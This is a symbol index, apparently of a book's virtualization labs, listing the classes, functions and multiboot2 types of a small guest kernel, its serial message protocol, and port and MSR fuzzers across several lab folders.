class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 28) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 31) | def _init_boot_info(self, symbols, mmap):
method messages (line 42) | def messages(self):
method op_write (line 52) | def op_write(self, code, address=None):
method op_exec (line 63) | def op_exec(self, address):
method op_commit (line 69) | def op_commit(self):
method execute (line 73) | def execute(self, code):
FILE: ch24/labs/lab4/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab4/main.py
class OOBType (line 9) | class OOBType(Enum):
FILE: ch24/labs/lab4/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab4/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab4/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab4/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab4/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch24/labs/lab5/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab5/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab5/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab5/fuzzer.py
class OOBType (line 11) | class OOBType(Enum):
class Fuzzer (line 15) | class Fuzzer:
method __init__ (line 20) | def __init__(self, seed):
method timeout_handler (line 25) | def timeout_handler(signum, frame):
method context_save (line 28) | def context_save(self):
method context_restore (line 33) | def context_restore(self):
method code (line 38) | def code(self, code):
method fuzz (line 41) | def fuzz(self, reply):
method on_boot (line 44) | def on_boot(self, body):
method handle_message (line 47) | def handle_message(self, msg_type, body):
method run (line 65) | def run(self):
FILE: ch24/labs/lab5/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 27) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 30) | def _init_boot_info(self, symbols, mmap):
method messages (line 41) | def messages(self):
method op_write (line 51) | def op_write(self, code, address=None):
method op_exec (line 62) | def op_exec(self, address):
method op_commit (line 68) | def op_commit(self):
method execute (line 72) | def execute(self, code):
FILE: ch24/labs/lab5/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab5/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab5/port_fuzzer.py
class Fuzzer (line 8) | class Fuzzer(fuzzer.Fuzzer):
method __init__ (line 9) | def __init__(self, seed):
method fuzz (line 14) | def fuzz(self, reply):
FILE: ch24/labs/lab5/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab5/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab5/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab5/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch24/labs/lab6/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab6/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab6/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab6/fuzzer.py
class OOBType (line 11) | class OOBType(Enum):
class Fuzzer (line 15) | class Fuzzer:
method __init__ (line 20) | def __init__(self, seed):
method timeout_handler (line 25) | def timeout_handler(signum, frame):
method context_save (line 28) | def context_save(self):
method context_restore (line 33) | def context_restore(self):
method code (line 38) | def code(self, code):
method fuzz (line 41) | def fuzz(self, reply):
method on_boot (line 44) | def on_boot(self, body):
method handle_message (line 47) | def handle_message(self, msg_type, body):
method run (line 65) | def run(self):
FILE: ch24/labs/lab6/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 27) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 30) | def _init_boot_info(self, symbols, mmap):
method messages (line 41) | def messages(self):
method op_write (line 51) | def op_write(self, code, address=None):
method op_exec (line 62) | def op_exec(self, address):
method op_commit (line 68) | def op_commit(self):
method execute (line 72) | def execute(self, code):
FILE: ch24/labs/lab6/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab6/msr_fuzzer.py
function ROR (line 57) | def ROR(x, n, bits):
class Fuzzer (line 60) | class Fuzzer(fuzzer.Fuzzer):
method __init__ (line 61) | def __init__(self, seed):
method flip_bits (line 65) | def flip_bits(self, data, bits):
method fuzz (line 70) | def fuzz(self, reply):
FILE: ch24/labs/lab6/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab6/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab6/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab6/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab6/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch24/labs/lab7/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab7/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab7/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab7/fuzzer.py
class OOBType (line 11) | class OOBType(Enum):
class Fuzzer (line 15) | class Fuzzer:
method __init__ (line 20) | def __init__(self, seed):
method timeout_handler (line 25) | def timeout_handler(signum, frame):
method context_save (line 28) | def context_save(self):
method context_restore (line 33) | def context_restore(self):
method code (line 38) | def code(self, code):
method fuzz (line 41) | def fuzz(self, reply):
method on_boot (line 44) | def on_boot(self, body):
method install_idt (line 48) | def install_idt(self, vectors=30):
method make_vector_handler (line 64) | def make_vector_handler(self, vec):
method handle_message (line 95) | def handle_message(self, msg_type, body):
method run (line 113) | def run(self):
FILE: ch24/labs/lab7/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 27) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 30) | def _init_boot_info(self, symbols, mmap):
method messages (line 41) | def messages(self):
method op_write (line 51) | def op_write(self, code, address=None):
method op_exec (line 62) | def op_exec(self, address):
method op_commit (line 68) | def op_commit(self):
method execute (line 72) | def execute(self, code):
FILE: ch24/labs/lab7/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab7/msr_fuzzer.py
function ROR (line 57) | def ROR(x, n, bits):
class Fuzzer (line 60) | class Fuzzer(fuzzer.Fuzzer):
method __init__ (line 61) | def __init__(self, seed):
method flip_bits (line 65) | def flip_bits(self, data, bits):
method fuzz (line 70) | def fuzz(self, reply):
FILE: ch24/labs/lab7/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab7/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab7/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab7/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab7/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch25/labs/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch25/labs/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
